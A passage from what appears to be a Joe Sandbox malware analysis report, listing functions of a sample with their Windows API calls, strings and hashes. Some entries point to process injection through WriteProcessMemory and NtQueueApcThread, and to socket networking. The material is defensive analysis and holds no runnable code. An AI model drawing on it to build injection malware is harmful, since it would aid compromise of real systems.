Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: Virtual$ProtectQuery__iob_func
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2215987729-1534286854
Opcode ID: da65f03bf512c5053ef42d69f85adc9d6f67af8ab31bc596c8d7590a5edfbbcc
Instruction ID: 6d6294c0181dafc7dd15fa940f8138a1def2dfaf287c1bbae5131f6bee86d83f
Opcode Fuzzy Hash: da65f03bf512c5053ef42d69f85adc9d6f67af8ab31bc596c8d7590a5edfbbcc
Instruction Fuzzy Hash: C1419072701A4496EA10DF52E880B9A7761FB85BD8F48813AEE4C177A5DF3CC586C748

Uniqueness

Uniqueness Score: -1.00%

Function 03A7238C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113sleeplibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03A723F6
GetProcAddress.KERNEL32 ref: 03A72406

Part of subcall function 03A722A8: malloc.LIBCMT ref: 03A722E6
Part of subcall function 03A722A8: WriteProcessMemory.KERNEL32 ref: 03A72354
Part of subcall function 03A722A8: free.LIBCMT ref: 03A7236A

Thread32Next.KERNEL32 ref: 03A724A2
Sleep.KERNEL32 ref: 03A724B8
ReadProcessMemory.KERNEL32 ref: 03A724D9
WriteProcessMemory.KERNEL32 ref: 03A7250C

Strings

ntdll, xrefs: 03A723C1
NtQueueApcThread, xrefs: 03A723FC

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: MemoryProcess$Write$AddressHandleModuleNextProcReadSleepThread32freemalloc
String ID: NtQueueApcThread$ntdll
API String ID: 2421628550-1374908105
Opcode ID: bfb52fbe3132d43843797ddb625b63e92ee4822df1cb6bb90e03f41037cd665a
Instruction ID: 557d9d2a294fbdea44156997036d1574058b72f37386b5a5b0b5f04017f52dd9
Opcode Fuzzy Hash: bfb52fbe3132d43843797ddb625b63e92ee4822df1cb6bb90e03f41037cd665a
Instruction Fuzzy Hash: 60416C72701B118AEB21CB62E9903AD73B9FB587C8F48452ACE8E57B18EF38C545C740

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2D7 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 34fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 0041B30D
fputs.MSVCRT ref: 0041B31B
fputc.MSVCRT ref: 0041B32B
abort.MSVCRT ref: 0041B335
__iob_func.MSVCRT ref: 0041B33A
fwrite.MSVCRT ref: 0041B356

Strings

what(): , xrefs: 0041B306
terminate called without an active exception, xrefs: 0041B34F

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: fwrite$__iob_funcabortfputcfputs
String ID: what(): $terminate called without an active exception
API String ID: 464441043-1947023079
Opcode ID: cfc9e03135a2e0c2d56c459d8e7be3599460bc6c7d1c0fd6dfc871f0e4c5b7b2
Instruction ID: c151b562a341115dce892b0bd1b6d20a3d6805cd7aec49a487b638611648ef9e
Opcode Fuzzy Hash: cfc9e03135a2e0c2d56c459d8e7be3599460bc6c7d1c0fd6dfc871f0e4c5b7b2
Instruction Fuzzy Hash: 04F037B130170C96DA10BBA2E8613992A10FB96B88F45001FEE1A43795DE3EC586835A

Uniqueness

Uniqueness Score: -1.00%

Function 0048F8B0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0048F949
memcpy.MSVCRT ref: 0048F96C
memcpy.MSVCRT ref: 0048F9BC
memcpy.MSVCRT ref: 0048F9F7
memcpy.MSVCRT ref: 0048FA2B

Strings

basic_string::_M_replace, xrefs: 0048FB3E

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: fc02f776d05281248049fba21633b7604f664a2e716a0f07c864bf20a25e9d93
Instruction ID: 03270c7fbd5890c1a634483b1434fbc921100d497a591300c2ba575f52fb6626
Opcode Fuzzy Hash: fc02f776d05281248049fba21633b7604f664a2e716a0f07c864bf20a25e9d93
Instruction Fuzzy Hash: EA5116A6711A94A1CA14FF15D0106BE6715FB44FE4B988A37EE6E43754EB3CC88AC309

Uniqueness

Uniqueness Score: -1.00%

Function 0048CEE0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0048CF78
memcpy.MSVCRT ref: 0048CF9A
memcpy.MSVCRT ref: 0048CFEA
memcpy.MSVCRT ref: 0048D01A
memcpy.MSVCRT ref: 0048D048

Strings

basic_string::_M_replace, xrefs: 0048D15D

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: 6e9b63c28a51b938c8f426bc4ae95c5e4763d4013f80d051c0536024012b5ae6
Instruction ID: 477a53c9468beacf3b2701966eb38652cec286552d3f6013dfe5560c7b983fc5
Opcode Fuzzy Hash: 6e9b63c28a51b938c8f426bc4ae95c5e4763d4013f80d051c0536024012b5ae6
Instruction Fuzzy Hash: 0C517E327066D495CE12BB29C15057E6B16AB02FC8F984E07FF6A17BC5CA3DC546C319

Uniqueness

Uniqueness Score: -1.00%

Function 03A8DC10 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 03A8DC36
_errno.LIBCMT ref: 03A8DC2B

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1812809483-0
Opcode ID: 2db82fa7e3577a0467f99b3b756d91ff98ac30b20cd2bff14b3452a9952b3022
Instruction ID: 9a058cc7f2fdaea0d028fce43a29376b7c0c03610280f64cc141c9b6e4a428ef
Opcode Fuzzy Hash: 2db82fa7e3577a0467f99b3b756d91ff98ac30b20cd2bff14b3452a9952b3022
Instruction Fuzzy Hash: 5A4167B66153D1C6DF20FB329A442B977A1FB94BA8F98422BDB944BBC4D778C141C700

Uniqueness

Uniqueness Score: -1.00%

Function 03A7E1BC Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03A7E1A4: _mtinitlocknum.LIBCMT ref: 03A81C5E
Part of subcall function 03A7E1A4: _amsg_exit.LIBCMT ref: 03A81C6A

DecodePointer.KERNEL32 ref: 03A7E218
DecodePointer.KERNEL32 ref: 03A7E236
EncodePointer.KERNEL32 ref: 03A7E264
DecodePointer.KERNEL32 ref: 03A7E279
EncodePointer.KERNEL32 ref: 03A7E284
DecodePointer.KERNEL32 ref: 03A7E296
DecodePointer.KERNEL32 ref: 03A7E2A6
__crtCorExitProcess.LIBCMT ref: 03A7E32A
ExitProcess.KERNEL32 ref: 03A7E332

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
String ID:
API String ID: 1550138920-0
Opcode ID: 0ef9eb6f061b4daf03fdf3e42c16e4d13342b6aff9f2cfcfd4baff68ba1b4b73
Instruction ID: 4b1fbeb099cc5e1c00747e3103bb42eb9a60ff1fe0b0ab584b0fb437de666793
Opcode Fuzzy Hash: 0ef9eb6f061b4daf03fdf3e42c16e4d13342b6aff9f2cfcfd4baff68ba1b4b73
Instruction Fuzzy Hash: D7419F35316B4081EB55DF11FD90729A3A9B789BC4F48016AEA8EA7B24DF3CC559C702

Uniqueness

Uniqueness Score: -1.00%

Function 03A7604C Relevance: 13.6, APIs: 9, Instructions: 96threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03A76087
UpdateProcThreadAttribute.KERNEL32 ref: 03A760C7
GetLastError.KERNEL32 ref: 03A760D1
GetCurrentProcess.KERNEL32 ref: 03A76106
DuplicateHandle.KERNEL32 ref: 03A7612E
GetCurrentProcess.KERNEL32 ref: 03A76147
DuplicateHandle.KERNEL32 ref: 03A7616A
GetCurrentProcess.KERNEL32 ref: 03A76179
DuplicateHandle.KERNEL32 ref: 03A7619D

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CurrentDuplicateHandleProcess$ErrorLast$AttributeProcThreadUpdate
String ID:
API String ID: 570851288-0
Opcode ID: dda4d696657d8428a178a4cccd50c6335780de972918c4e264b35949d0234b26
Instruction ID: e5f55a220982921b849713f0685ad1ee92e22649b7b7cf73359e2f7299e3dd23
Opcode Fuzzy Hash: dda4d696657d8428a178a4cccd50c6335780de972918c4e264b35949d0234b26
Instruction Fuzzy Hash: AD416D32714B8087EB15CF62E88835AB7A5F789BD9F08412ADE8A57B65DF7CC2058701

Uniqueness

Uniqueness Score: -1.00%

Function 03A74B88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 03A74BC9
htons.WS2_32 ref: 03A74BDA
socket.WS2_32 ref: 03A74C1C
closesocket.WS2_32 ref: 03A74C31
gethostbyname.WS2_32 ref: 03A74C50
htons.WS2_32 ref: 03A74C80
ioctlsocket.WS2_32 ref: 03A74C9A
connect.WS2_32 ref: 03A74CB2
WSAGetLastError.WS2_32 ref: 03A74CBC

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
String ID:
API String ID: 3339321253-0
Opcode ID: 0621e14f71e2d88feb01d696d24d30253457c2253971658608e7fecda2256e50
Instruction ID: 2520e46fd117a778f810b82c218b35daddb97eb1d5c643b0c8d147d7f6bffb7d
Opcode Fuzzy Hash: 0621e14f71e2d88feb01d696d24d30253457c2253971658608e7fecda2256e50
Instruction Fuzzy Hash: 66315A62304A9086DB25DF22EC8476E7369FB48BD8F444126DE4A07794EF3CC649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0368373B Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03683766

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

__doserrno.LIBCMT ref: 0368375E

Part of subcall function 0367EFA3: _getptd_noexit.LIBCMT ref: 0367EFA7

__lock_fhandle.LIBCMT ref: 036837AA
_unlock_fhandle.LIBCMT ref: 036837E4

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
String ID:
API String ID: 2464146582-0
Opcode ID: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
Instruction ID: b632ee62d9484a140845998e0ffa55a5e1bf5109c53006eefc9864c2a7f1f976
Opcode Fuzzy Hash: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
Instruction Fuzzy Hash: 7321377CA0D7004EE318FB2CD89537D76D0EB8AA30F65075DD0168F391DBA5980286AA

Uniqueness

Uniqueness Score: -1.00%

Function 03A75220 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03A75268: htonl.WS2_32 ref: 03A752C5
Part of subcall function 03A75268: select.WS2_32 ref: 03A75333
Part of subcall function 03A75268: __WSAFDIsSet.WS2_32 ref: 03A7534B
Part of subcall function 03A75268: accept.WS2_32 ref: 03A75368
Part of subcall function 03A75268: ioctlsocket.WS2_32 ref: 03A75380
Part of subcall function 03A75268: __WSAFDIsSet.WS2_32 ref: 03A75423

GetTickCount.KERNEL32 ref: 03A75232

Part of subcall function 03A755B4: malloc.LIBCMT ref: 03A755E6
Part of subcall function 03A755B4: htonl.WS2_32 ref: 03A75619
Part of subcall function 03A755B4: recvfrom.WS2_32 ref: 03A7565D
Part of subcall function 03A755B4: WSAGetLastError.WS2_32 ref: 03A7566A

GetTickCount.KERNEL32 ref: 03A7524A
GetTickCount.KERNEL32 ref: 03A75768
GetTickCount.KERNEL32 ref: 03A7577E
shutdown.WS2_32 ref: 03A7579D
shutdown.WS2_32 ref: 03A757B2
closesocket.WS2_32 ref: 03A757BC
free.LIBCMT ref: 03A757DC
free.LIBCMT ref: 03A757F1

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
String ID:
API String ID: 3610715900-0
Opcode ID: 88e486cb06a14a5883469a77d23634fc32d297ebefc922b574edaf9e776b3f38
Instruction ID: 5f4a6260f94dd1009f7a800ebfe8ed9813a078a38a087095dcaa6f8a3fb2d61d
Opcode Fuzzy Hash: 88e486cb06a14a5883469a77d23634fc32d297ebefc922b574edaf9e776b3f38
Instruction Fuzzy Hash: 56215E36B00A41C7EB25DF66E98436D6378FB4BB94F1C4927CA894A614DF34C5908781

Uniqueness

Uniqueness Score: -1.00%

Function 03682F5F Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03682F80

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

__doserrno.LIBCMT ref: 03682F78

Part of subcall function 0367EFA3: _getptd_noexit.LIBCMT ref: 0367EFA7

__lock_fhandle.LIBCMT ref: 03682FC4
_close_nolock.LIBCMT ref: 03682FD7
_unlock_fhandle.LIBCMT ref: 03682FF0

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
String ID:
API String ID: 2140805544-0
Opcode ID: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
Instruction ID: aab011f8944ab3b6175e1c4662afeafa42dbde200617a6a9c8479505c5d946cc
Opcode Fuzzy Hash: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
Instruction Fuzzy Hash: 3C11383A549B004ED329FF68DCA072D7690EF49325F660B6DD0168F3E1CBB59841C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 03A85AC8 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03A85AF3

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

__doserrno.LIBCMT ref: 03A85AEB

Part of subcall function 03A7FB5C: _getptd_noexit.LIBCMT ref: 03A7FB60

__lock_fhandle.LIBCMT ref: 03A85B37
_lseeki64_nolock.LIBCMT ref: 03A85B50

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
String ID:
API String ID: 4140391395-0
Opcode ID: 56b34c18a28ca68a05c0e5a09bbf2d31e6e5b89d40deec44bc05dc379c93aa6f
Instruction ID: 08e9e0d3b8d67c2ce17bcfe5764752635318d4979fc88c93dc256e5027ebd18d
Opcode Fuzzy Hash: 56b34c18a28ca68a05c0e5a09bbf2d31e6e5b89d40deec44bc05dc379c93aa6f
Instruction Fuzzy Hash: E411C076B006844AD706FF29999832E7A61A791BF1F095B1A9E390B3D0EB7C84418725

Uniqueness

Uniqueness Score: -1.00%

Function 03A85950 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03A8597B

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

__doserrno.LIBCMT ref: 03A85973

Part of subcall function 03A7FB5C: _getptd_noexit.LIBCMT ref: 03A7FB60

__lock_fhandle.LIBCMT ref: 03A859BF
_lseek_nolock.LIBCMT ref: 03A859D8

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
String ID:
API String ID: 310312816-0
Opcode ID: 4833c2b8665bf31d984187e315fea37269f990f532a28b2b0e30fdfe739480cc
Instruction ID: 2461f7dd4007b6ab04917cd4cf2ec846b2f2180cc9d5d4d272d5fd3c514bf9ab
Opcode Fuzzy Hash: 4833c2b8665bf31d984187e315fea37269f990f532a28b2b0e30fdfe739480cc
Instruction Fuzzy Hash: 6511E472B107804DD706FF65DDD836EBA51ABC17A1F49551BDE160B390DBBC8442C721

Uniqueness

Uniqueness Score: -1.00%

Function 0367D2F3 Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 0367D321

Part of subcall function 0367C5CF: _errno.LIBCMT ref: 0367C5EF

free.LIBCMT ref: 0367D336
free.LIBCMT ref: 0367D357
free.LIBCMT ref: 0367D36C
free.LIBCMT ref: 0367D380
free.LIBCMT ref: 0367D38C
free.LIBCMT ref: 0367D3B7
free.LIBCMT ref: 0367D3D8
free.LIBCMT ref: 0367D3F1
free.LIBCMT ref: 0367D422

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction ID: 7ecd45a2e75a98c0edad0a547966ed07dfa2aaf16ce0e288571e984df2600cd2
Opcode Fuzzy Hash: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction Fuzzy Hash: 46318F35264E0A8FFF64FB68E9E47687391FB58325FD8462D8009C72A0DA7CC855C715

Uniqueness

Uniqueness Score: -1.00%

Function 03A755B4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A755E6

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

htonl.WS2_32 ref: 03A75619
recvfrom.WS2_32 ref: 03A7565D
WSAGetLastError.WS2_32 ref: 03A7566A

Strings

C:\Windows\system32\wininet.dll, xrefs: 03A755E1

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
String ID: C:\Windows\system32\wininet.dll
API String ID: 2310505145-2281562036
Opcode ID: 018ee31d047f13e18eb2acc08179a8f443975026078621be6262547f92683203
Instruction ID: 72dfc6b325d6a536a8fa156f56e6c9014b83b89549ede7e79cd9f970e201a65b
Opcode Fuzzy Hash: 018ee31d047f13e18eb2acc08179a8f443975026078621be6262547f92683203
Instruction Fuzzy Hash: 91410572B00B40C6EB21DF65EC8471A77A8F78ABE8F184526DA8947B64DF3CC581CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03A842F4 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03A8431F

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

__doserrno.LIBCMT ref: 03A84317

Part of subcall function 03A7FB5C: _getptd_noexit.LIBCMT ref: 03A7FB60

__lock_fhandle.LIBCMT ref: 03A84363

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
String ID:
API String ID: 2611593033-0
Opcode ID: 70799e69bd9062a04ea1f8efc400af3973f5b9fc7b5330ceef23c38fc380ada8
Instruction ID: 32f50d16a8dc6244d803f974d7737ebcea2fa4b33853a36e9e7fe23ab2966db9
Opcode Fuzzy Hash: 70799e69bd9062a04ea1f8efc400af3973f5b9fc7b5330ceef23c38fc380ada8
Instruction Fuzzy Hash: 891136337007814AD702FF26DE9432E7A21E7C4BA1F89551B9A250F390CBBCC441C721

Uniqueness

Uniqueness Score: -1.00%

Function 03A885FC Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

